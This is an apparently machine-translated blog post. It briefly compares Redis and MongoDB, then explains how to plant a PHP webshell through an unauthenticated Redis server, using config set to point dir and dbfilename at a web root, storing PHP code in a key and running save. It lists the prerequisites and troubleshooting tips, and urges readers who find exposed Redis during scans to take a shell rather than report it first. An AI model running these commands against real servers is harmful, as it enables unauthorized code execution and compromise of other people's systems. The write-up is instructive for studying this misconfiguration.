Using redis to write webshell

Using redis to write webshell

What I see in redis and mongodb

Recently, I am working on some personal small creations and small projects, including using mongodb and redis. I may not have a deep understanding of them at first.
What is the difference between non-relational databases?

In fact, in my opinion, the role of redis is closer to memcache, while mongodb is a real database.

Redis is a key-value database. information is stored in the memory based on the relationship between key-value pairs. The advantage of redis over memcache lies in the diversity of its data structures.

It is not a real database, because redis mainly stores data in the memory (of course, it can be stored on the hard disk, which is also one of the necessary conditions for shell writing ), its "cache" is much more powerful than its "Data Storage". The data correction and modification operations are just as simple as variable operations. Mongodb is a "Data Storage" system. When adding, deleting, modifying, and querying data, there are "and" or "conditions. The data query method is as flexible as that of SQL database, this is what redis does not possess.

So in my project, redis is used as the memory of session and task queue, while mongodb is used as the storage of data (including user information.

Go to the topic. I saw the security problem that redis may cause on freebuf yesterday. I mentioned writing files, so I will explain the method here.

After the redis installation is complete, you have your own command line, that is, redis-cli, which contains the command can be viewed in: http://www.bkjia.com. Each client adds, deletes, modifies, and queries based on this command.

Previously we mentioned that redis data is mainly stored in the memory. When it is different from memcache, we can execute the "save" command at any time to save the current redis data to the hard disk, in addition, redis will automatically store data to the hard disk according to the configuration.

This has to talk about redis's persistent operation solution http://www.bkjia.com, which refers to an RDB, an AOF. RDB is more like a database backup file, while AOF is a log file. We can set redis to back up data at a specified time and number of changes to generate an RDB file. While setting AOF, logs can be written to the end of a file after an operation or time. When more operations are performed, the AOF file will become larger and larger.

 

The two complement each other. With the cooperation of the two, we can stably and persistently store data on servers.

 

Using redis to write webshell

We use these data storage operations to write arbitrary files.

There are several key items in redis Configuration:

Dir, which specifies the "working path" of redis. The generated RDB and AOF files will be stored here.

Dbfilename, RDB file name. The default value is "dump. rdb"

Appendonly, whether to enable AOF

Appendfilename, AOF file name. The default value is "appendonly. aof"

Appendfsync and AOF backup methods: always, everysec, and no

After my research, we can set dir to a directory a, while dbfilename to file name B, and then execute save or bgsave, then we can write an arbitrary file with the path a/B:

 

When we get a redis console, we can call the config set/get command to modify some redis configurations.

However, we can use config set to change the dir and dbfilename. In other words, we can write any file without modifying redis. conf or restarting the redis service:

config set dir /home/wwwroot/default/
config set dbfilename redis.php
set webshell "<?php phpinfo(); ?>"
save

When we set a variable webshell to "<? Php phpinfo () ;?>" Then, you can perform getshell on the server. It can be seen that the data has been written:

The exported RDB is actually a binary file, but it contains <? Php phpinfo () ;?>, So it is parsed:

In the previous figure, we can see that an appendonly. aof is generated. Can this file name be customized? Unfortunately, the value of appendfilename cannot be defined using the config set command:

However, only one dbfilename is enough.

Therefore, if you scan for unauthorized access to redis in the future, do not rush to submit the dark clouds. Check whether the server has any web services. If yes, try to win the webshell.

Related posture

Redis has high permissions, generally root.

Prerequisites:

1. redis is not authorized to connect to redis-cli

2. Open the web and know the path (such as using phpinfo)

If you fail to perform a successful check, check: 1. shell readable permission; 2. Is there any content in front of the shell? <? This character breaks the shell (the main cause may be a problem with shell writing)

Alibaba Cloud Hot Products
Elastic Compute Service (ECS)	Dedicated Host (DDH)	ApsaraDB RDS for MySQL (RDS)	ApsaraDB for PolarDB(PolarDB)	AnalyticDB for PostgreSQL (ADB for PG)
AnalyticDB for MySQL(ADB for MySQL)	Data Transmission Service (DTS)	Server Load Balancer (SLB)	Global Accelerator (GA)	Cloud Enterprise Network (CEN)
Object Storage Service (OSS)	Content Delivery Network (CDN)	Short Message Service (SMS)	Container Service for Kubernetes (ACK)	Data Lake Analytics (DLA)
ApsaraDB for Redis (Redis)	ApsaraDB for MongoDB (MongoDB)	NAT Gateway	VPN Gateway	Cloud Firewall
Anti-DDoS	Web Application Firewall (WAF)	Log Service	DataWorks	MaxCompute
Elastic MapReduce (EMR)	Elasticsearch